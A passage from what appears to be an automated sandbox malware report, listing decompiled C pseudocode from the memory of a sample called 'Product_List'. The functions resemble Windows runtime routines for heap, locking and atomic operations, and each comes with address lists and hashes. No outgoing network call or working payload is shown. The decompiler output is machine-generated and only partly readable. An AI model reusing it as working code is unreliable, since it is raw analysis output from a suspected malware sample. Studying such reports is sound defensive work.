					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = L01795E50(0x17467cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01839D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						L0176F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                      0x017961b3
                                                      0x017961b5
                                                      0x017961bd
                                                      0x017961c3
                                                      0x017961c7
                                                      0x017961d2
                                                      0x017961ff
                                                      0x017961ff
                                                      0x01796201
                                                      0x01796207
                                                      0x01796207
                                                      0x017961d4
                                                      0x017961d9
                                                      0x00000000
                                                      0x00000000
                                                      0x017961df
                                                      0x017961e2
                                                      0x00000000
                                                      0x00000000
                                                      0x017961e6
                                                      0x017961e8
                                                      0x017961ee
                                                      0x017961ee
                                                      0x017961f9
                                                      0x017d762f
                                                      0x017d7632
                                                      0x017d7635
                                                      0x017d7639
                                                      0x017d7640
                                                      0x017d766e
                                                      0x017d7675
                                                      0x00000000
                                                      0x00000000
                                                      0x017d7681
                                                      0x017d7689
                                                      0x017d768d
                                                      0x017d7691
                                                      0x017d7695
                                                      0x017d7699
                                                      0x017d76af
                                                      0x017d76b5
                                                      0x017d76b7
                                                      0x017d76b7
                                                      0x017d76d7
                                                      0x017d76dc
                                                      0x00000000
                                                      0x017d76dc
                                                      0x017d76a2
                                                      0x017d76a9
                                                      0x017d7651
                                                      0x017d7653
                                                      0x017d7653
                                                      0x017d7656
                                                      0x017d7656
                                                      0x00000000
                                                      0x017d7656
                                                      0x017d7644
                                                      0x017d7646
                                                      0x017d7648
                                                      0x017d7648
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a0d629a9430621151ec9cc6f1c059f7490e933b510db05e453c8df971d889766
                                                      • Instruction ID: fd0ac8b0e6bb4f5c51cfad85fdd6398ab30fbf88c20ac314ab2a39903d2c2cb1
                                                      • Opcode Fuzzy Hash: a0d629a9430621151ec9cc6f1c059f7490e933b510db05e453c8df971d889766
                                                      • Instruction Fuzzy Hash: 81316BB16093018FE724CF1DC900B26FBE4FB88B04F45496DFA949B251E7B0D804CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0176AA16 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E0176AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x185d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1857b9c; // 0x0
					_t53 = L01784620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return L017AB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E017AF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01776C59(_t53, _t51, _t58) != 0) {
							_t28 = L01795E50(0x174c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0179B230(_v32, _v28, 0x174c2d8, 1,  &_v24);
								_t28 = L0176F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                      0x0176aa25
                                                      0x0176aa29
                                                      0x0176aa2d
                                                      0x0176aa30
                                                      0x0176aa37
                                                      0x0176aa3c
                                                      0x017c4458
                                                      0x017c4458
                                                      0x017c4472
                                                      0x017c4474
                                                      0x017c4476
                                                      0x0176aa64
                                                      0x0176aa74
                                                      0x017c447c
                                                      0x017c4483
                                                      0x017c4492
                                                      0x0176aa52
                                                      0x0176aa54
                                                      0x0176aa5e
                                                      0x017c44a8
                                                      0x017c44ad
                                                      0x017c44af
                                                      0x017c44b6
                                                      0x017c44b6
                                                      0x017c44b9
                                                      0x017c44bc
                                                      0x017c44cd
                                                      0x017c44d3
                                                      0x017c44d6
                                                      0x017c44e1
                                                      0x017c44e1
                                                      0x017c44e6
                                                      0x017c44e8
                                                      0x017c44fb
                                                      0x017c44fb
                                                      0x017c44e8
                                                      0x00000000
                                                      0x0176aa5e
                                                      0x017c4476
                                                      0x0176aa42
                                                      0x0176aa46
                                                      0x0176aa48
                                                      0x0176aa4c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40793c45a1e48cee5dbc2df6364fd8c3c9157665f3343560e791331b5a94762e
                                                      • Instruction ID: 6ae49c67ea8c01fc932c684f7d824069e9a7a649fd0be22c7bd4685d15cfe5d8
                                                      • Opcode Fuzzy Hash: 40793c45a1e48cee5dbc2df6364fd8c3c9157665f3343560e791331b5a94762e
                                                      • Instruction Fuzzy Hash: 7131B171A0061AABCF11AF68CD51A7FF7B9EF44B00B51406EF902E7154E7749E11CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A4A2C Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E017A4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x185d360 ^ _t62;
				_v8 =  *0x185d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01782280(_t26, 0x1858608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						L0177FFB0(_t41, _t51, 0x1858608);
						L2:
						 *0x185b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return L017AB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01782280(_t28, 0x1858608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							L0177FFB0(_t42, _t53, 0x1858608);
							if(_t53 != 0) {
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						L0177FFB0(_t41, _t51, 0x1858608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                      0x017a4a2c
                                                      0x017a4a34
                                                      0x017a4a3c
                                                      0x017a4a3e
                                                      0x017a4a48
                                                      0x017a4a4b
                                                      0x017a4a4d
                                                      0x017a4a51
                                                      0x017a4a9c
                                                      0x00000000
                                                      0x00000000
                                                      0x017a4aa3
                                                      0x017a4aa8
                                                      0x017a4aad
                                                      0x017a4ab1
                                                      0x017a4ade
                                                      0x017a4ae3
                                                      0x017a4a5a
                                                      0x017a4a62
                                                      0x017a4a6a
                                                      0x017a4a6e
                                                      0x017df203
                                                      0x017a4a84
                                                      0x017a4a88
                                                      0x017a4a89
                                                      0x017a4a8a
                                                      0x017a4a95
                                                      0x017a4a95
                                                      0x017a4a79
                                                      0x017a4a80
                                                      0x017a4af2
                                                      0x017a4af4
                                                      0x017a4af9
                                                      0x017a4aff
                                                      0x017a4b01
                                                      0x017a4b03
                                                      0x017a4b08
                                                      0x017df20a
                                                      0x017df212
                                                      0x017df216
                                                      0x017df216
                                                      0x017a4b08
                                                      0x017a4b13
                                                      0x017a4b1a
                                                      0x017df229
                                                      0x017df229
                                                      0x017a4b1a
                                                      0x017a4a82
                                                      0x00000000
                                                      0x017a4a82
                                                      0x017a4ab7
                                                      0x017a4acd
                                                      0x017a4acd
                                                      0x017a4ad5
                                                      0x017a4ada
                                                      0x00000000
                                                      0x017a4ada
                                                      0x017a4ac2
                                                      0x017a4acb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017a4acb
                                                      0x017a4a53
                                                      0x017a4a53
                                                      0x017a4a58
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c0acadb3c75b73833352219cd14c3dbcbf40416d69e934cdea7b0c312eb569d
                                                      • Instruction ID: b331fbc1b995141628ac3b5f42f4bd6ad20770d0fd2e322e91ffe686e0e3ca86
                                                      • Opcode Fuzzy Hash: 8c0acadb3c75b73833352219cd14c3dbcbf40416d69e934cdea7b0c312eb569d
                                                      • Instruction Fuzzy Hash: 32312632205711DBC761AF69C989B2AFBE4FFC1710F880659E85747245CBB5EA00CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01769100 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E01769100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x183f6e8);
				E017BD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E018388F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E017BD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x18586c0; // 0x12407b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x18586b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01782280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E018388F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							L017AAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x185b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x18584c0;
										if(_t69 >=  *0x18584c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01839063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0176922A(_t82);
							_t53 = E01787D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01838B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x18586c0; // 0x12407b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x18586b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x18586bc;
										_t72 = 0x18586b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01769240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x18586c4;
									_t72 = 0x18586c0;
									L18:
									E01799B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                      0x01769100
                                                      0x01769100
                                                      0x01769100
                                                      0x01769100
                                                      0x01769102
                                                      0x01769107
                                                      0x0176910c
                                                      0x01769110
                                                      0x01769115
                                                      0x01769136
                                                      0x01769143
                                                      0x017c37e4
                                                      0x017c37e4
                                                      0x01769149
                                                      0x0176914e
                                                      0x0176914e
                                                      0x01769117
                                                      0x0176911d
                                                      0x00000000
                                                      0x00000000
                                                      0x0176911f
                                                      0x01769125
                                                      0x00000000
                                                      0x01769151
                                                      0x01769158
                                                      0x0176915d
                                                      0x01769161
                                                      0x01769168
                                                      0x017c3715
                                                      0x00000000
                                                      0x0176916e
                                                      0x0176916e
                                                      0x01769175
                                                      0x01769177
                                                      0x0176917e
                                                      0x0176917f
                                                      0x01769182
                                                      0x01769182
                                                      0x01769187
                                                      0x01769187
                                                      0x0176918a
                                                      0x0176918d
                                                      0x0176918f
                                                      0x01769192
                                                      0x01769195
                                                      0x01769198
                                                      0x01769198
                                                      0x01769198
                                                      0x0176919a
                                                      0x00000000
                                                      0x00000000
                                                      0x017c371f
                                                      0x017c3721
                                                      0x017c3727
                                                      0x017c372f
                                                      0x017c3733
                                                      0x017c3735
                                                      0x017c3738
                                                      0x017c373b
                                                      0x017c373d
                                                      0x017c3740
                                                      0x00000000
                                                      0x00000000
                                                      0x017c3746
                                                      0x017c3749
                                                      0x00000000
                                                      0x00000000
                                                      0x017c374f
                                                      0x017c3751
                                                      0x00000000
                                                      0x00000000
                                                      0x017c3757
                                                      0x017c3759
                                                      0x017c375c
                                                      0x017c375c
                                                      0x017c375e
                                                      0x017c375e
                                                      0x017c3761
                                                      0x017c3764
                                                      0x00000000
                                                      0x00000000
                                                      0x017c3766
                                                      0x017c3768
                                                      0x017c37a3
                                                      0x017c37a3
                                                      0x017c37a5
                                                      0x017c37a7
                                                      0x017c37ad
                                                      0x017c37b0
                                                      0x017c37b2
                                                      0x017c37bc
                                                      0x017c37c2
                                                      0x017c37c2
                                                      0x017c37b2
                                                      0x01769187
                                                      0x01769187
                                                      0x0176918a
                                                      0x0176918d
                                                      0x0176918f
                                                      0x01769192
                                                      0x01769195
                                                      0x00000000
                                                      0x01769195
                                                      0x00000000
                                                      0x01769187
                                                      0x017c376a
                                                      0x017c376a
                                                      0x017c376c
                                                      0x017c376c
                                                      0x017c376f
                                                      0x017c3775
                                                      0x00000000
                                                      0x00000000
                                                      0x017c3777
                                                      0x017c3779
                                                      0x00000000
                                                      0x00000000
                                                      0x017c3782
                                                      0x017c3787
                                                      0x017c3789
                                                      0x017c3790
                                                      0x017c3790
                                                      0x017c378b
                                                      0x017c378b
                                                      0x017c378b
                                                      0x017c3792
                                                      0x017c3795
                                                      0x017c3795
                                                      0x017c3798
                                                      0x017c3798
                                                      0x017c379b
                                                      0x017c379b
                                                      0x017691a3
                                                      0x017691a9
                                                      0x017691b0
                                                      0x017691b4
                                                      0x017691b4
                                                      0x017691bb
                                                      0x017691c0
                                                      0x017691c5
                                                      0x017691c7
                                                      0x017c37da
                                                      0x017691cd
                                                      0x017691cd
                                                      0x017691cd
                                                      0x017691d2
                                                      0x017691d5
                                                      0x01769239
                                                      0x01769239
                                                      0x017691d7
                                                      0x017691db
                                                      0x017691e1
                                                      0x017691e7
                                                      0x017691fd
                                                      0x01769203
                                                      0x0176921e
                                                      0x01769223
                                                      0x00000000
                                                      0x01769223
                                                      0x01769205
                                                      0x01769208
                                                      0x0176920c
                                                      0x01769214
                                                      0x01769214
                                                      0x017691e9
                                                      0x017691e9
                                                      0x017691ee
                                                      0x017691f3
                                                      0x017691f3
                                                      0x017691f3
                                                      0x017691e7
                                                      0x00000000
                                                      0x017691db
                                                      0x01769187
                                                      0x01769168

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 01e44909cd3b3fc5c271ebbff23f30e806e75aeb6e4d69bd8268c47f95646b2d
                                                      • Instruction ID: 2dddcb6342d70ee21d2a5960e3ba008702b029286153738f52b2388e94b38ecb
                                                      • Opcode Fuzzy Hash: 01e44909cd3b3fc5c271ebbff23f30e806e75aeb6e4d69bd8268c47f95646b2d
                                                      • Instruction Fuzzy Hash: A431DB75A05245DFDB29DF6CC58C7ACFBF5BB49318F28815ECA0467241D334A984CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01791DB5 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E01791DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0178F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01784620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0178F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                      0x01791dc2
                                                      0x01791dc5
                                                      0x01791dc7
                                                      0x01791dcc
                                                      0x01791dce
                                                      0x01791dd6
                                                      0x01791ddf
                                                      0x01791de0
                                                      0x01791de1
                                                      0x01791de5
                                                      0x01791de8
                                                      0x01791def
                                                      0x01791df0
                                                      0x01791df6
                                                      0x01791df7
                                                      0x01791dfe
                                                      0x01791e1a
                                                      0x00000000
                                                      0x00000000
                                                      0x01791e0b
                                                      0x01791e12
                                                      0x01791e12
                                                      0x01791e00
                                                      0x01791e00
                                                      0x01791e05
                                                      0x01791e1e
                                                      0x01791e23
                                                      0x017d570f
                                                      0x017d5713
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5719
                                                      0x017d5719
                                                      0x01791e2c
                                                      0x01791e2d
                                                      0x01791e2e
                                                      0x01791e2f
                                                      0x01791e31
                                                      0x01791e32
                                                      0x01791e35
                                                      0x01791e3d
                                                      0x017d5723
                                                      0x017d573d
                                                      0x017d573d
                                                      0x00000000
                                                      0x017d5723
                                                      0x01791e49
                                                      0x01791e4e
                                                      0x01791e4e
                                                      0x01791e09
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                      • Instruction ID: 079cb77b35c04757c9bb7fca014e3c2b3b793d0f3dd600f1ca98c8fd597cb9b9
                                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                      • Instruction Fuzzy Hash: 4621F17260011AFFDB20DF99DC80EABFBBDEF89661F514095FA0597210D234AE11CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01780050 Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E01780050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x185d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				L01799ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return L017AB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01838A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = L01799702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x185b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                      0x01780055
                                                      0x0178005d
                                                      0x01780062
                                                      0x0178006c
                                                      0x0178006f
                                                      0x01780074
                                                      0x0178007a
                                                      0x0178007a
                                                      0x01780080
                                                      0x01780080
                                                      0x01780087
                                                      0x0178008d
                                                      0x0178008f
                                                      0x01780093
                                                      0x01780095
                                                      0x0178009b
                                                      0x017800f8
                                                      0x017800fb
                                                      0x017800fc
                                                      0x017800ff
                                                      0x01780108
                                                      0x01780108
                                                      0x017800a2
                                                      0x017800a6
                                                      0x017800b3
                                                      0x017800bc
                                                      0x017800c5
                                                      0x017800ca
                                                      0x017cc01e
                                                      0x00000000
                                                      0x00000000
                                                      0x017cc02d
